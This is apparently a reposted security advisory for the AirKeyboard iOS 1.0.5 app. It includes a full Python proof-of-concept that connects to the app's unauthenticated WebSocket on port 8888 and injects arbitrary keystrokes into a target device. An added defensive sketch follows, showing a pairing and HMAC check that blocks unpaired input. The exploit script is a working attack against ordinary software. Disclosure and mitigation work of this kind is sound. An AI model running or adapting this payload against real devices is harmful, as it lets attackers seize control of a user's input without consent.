AirKeyboard iOS App 1.0.5 Remote Input Injection
AirKeyboard iOS 1.0.5 has a remote input injection vulnerability that lets an attacker control the device's input in real time over WebSocket without authentication. 2025-6-15 17:21:25 Author: cxsecurity.com


# Exploit Title: AirKeyboard iOS App 1.0.5 - Remote Input Injection
# Date: 2025-06-13
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://airkeyboardapp.com
# Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929
# Version: Version 1.0.5
# Tested on: iOS 18.5 with AirKeyboard app

'''
Description:
The AirKeyboard iOS application exposes a WebSocket server on port 8888 which
accepts arbitrary input injection messages from any client. No authentication
or pairing process is required. This allows any attacker to type arbitrary
keystrokes directly into the victim’s iOS device in real-time without user
interaction, resulting in full remote input control.
'''

import websocket
import json
import time

target_ip = "192.168.8.101"
ws_url = f"ws://{target_ip}:8888"
text = "i'm hacker i can write on your keyboard :)"

keystroke_payload = {
    "type": 1,
    "text": f"{text}",
    "mode": 0,
    "shiftKey": True,
    "selectionStart": 1,
    "selectionEnd": 1
}

def send_payload(ws):
    print("[+] Sending remote keystroke...")
    ws.send(json.dumps(keystroke_payload))
    time.sleep(1)
    ws.close()

def on_open(ws):
    send_payload(ws)

def on_error(ws, error):
    print(f"[!] Error: {error}")

def on_close(ws, close_status_code, close_msg):
    print("[*] Connection closed")

def exploit():
    print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888")
    ws = websocket.WebSocketApp(ws_url,
                                on_open=on_open,
                                on_error=on_error,
                                on_close=on_close)
    ws.run_forever()

if __name__ == "__main__":
    exploit()
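The root cause described above is that the WebSocket handler acts on input messages from any client. As an added example (not code from the advisory or from the vendor), the sketch below shows a per-connection gate that drops keystroke messages until the client proves knowledge of a pairing secret. Only the `"type": 1` / `"text"` fields come from the PoC; the `pair` message, its `proof` field, the out-of-band pairing secret and the lockout threshold are assumptions.

```python
import hashlib
import hmac
import json
import secrets

MAX_FAILED_PAIRINGS = 3  # assumed lockout threshold per connection


def pairing_proof(secret: bytes, nonce: str) -> str:
    """HMAC over the server's per-connection nonce; a paired client computes the same."""
    return hmac.new(secret, nonce.encode(), hashlib.sha256).hexdigest()


class InputSession:
    """State for one WebSocket connection; input is dropped until pairing succeeds."""

    def __init__(self, secret: bytes):
        self._secret = secret               # assumed to be shared out of band, e.g. via QR code
        self.nonce = secrets.token_hex(16)  # sent to the client on connect, never reused
        self.paired = False
        self.failures = 0
        self.closed = False

    def handle(self, raw: str):
        """Return the text to type for an accepted message, otherwise None."""
        if self.closed:
            return None
        try:
            msg = json.loads(raw)
        except (ValueError, RecursionError):
            return None
        if not isinstance(msg, dict):
            return None
        if msg.get("type") == "pair":  # hypothetical pairing message
            proof = msg.get("proof")
            expected = pairing_proof(self._secret, self.nonce)
            if isinstance(proof, str) and hmac.compare_digest(proof.encode(), expected.encode()):
                self.paired = True
            else:
                self.failures += 1
                self.closed = self.failures >= MAX_FAILED_PAIRINGS
            return None
        # Keystroke message in the shape shown in the advisory ("type": 1, "text": ...)
        if msg.get("type") == 1 and self.paired and isinstance(msg.get("text"), str):
            return msg["text"]
        return None
```

Because the nonce is fresh for every connection, a proof captured from one session is rejected on the next, and a connection that fails pairing three times stops being processed at all.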



 



Source: https://cxsecurity.com/issue/WLB-2025060015